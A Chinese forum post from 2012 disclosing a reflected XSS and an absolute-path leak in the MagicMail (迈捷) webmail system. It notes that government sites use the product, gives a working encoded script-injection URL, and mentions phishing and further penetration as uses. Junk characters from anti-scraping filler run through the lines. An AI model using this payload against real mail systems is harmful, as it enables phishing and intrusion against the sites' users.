今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞: @/ d5 N) c; l- }) h
, W) K8 ~/ y& |7 A6 l7 @$ _9 x
$ q2 u* ]+ x8 r K
包含 一个反射性XSS 以及 绝对路径泄漏
8 a9 N/ O2 C+ p' |3 p看了看 貌似全部是linux的。2 ]7 c, m& B( n8 h) T
# R8 P6 B6 y1 W" k n关键字:迈捷邮件系统 by MagicMail
; s: z( m. p% {. d$ R) X+ e8 v. ^
可以看到很多政府网站都用这个邮件系统
" U; ^. s5 J5 t' i* v1 V# W2 [9 L& m$ w5 V/ N* P4 ?
绝对路径 http://madman.in/index.php?login_type=declare&language=3 g" B, u, @% f1 H9 W; C
$ O2 g$ w8 A1 X! s& x3 b' V& A! I9 U" U# a- O' z
6 f& Y' A' ]5 a% fXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
! a( x/ S0 q( K7 j" j5 o# ]/ v9 k U
3 O+ `; z( I6 {* Z I( z; `/ T+ S7 D1 d; p% x3 j
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等' p1 Q6 s5 b$ z/ a0 ?' D0 j1 f6 S0 W
1 y1 k* g N, W5 k) t
修复方案:看官方补丁吧。5 \. b# F; P H# r: m
|
发表于 2012-11-9 20:38:41
收藏
支持
反对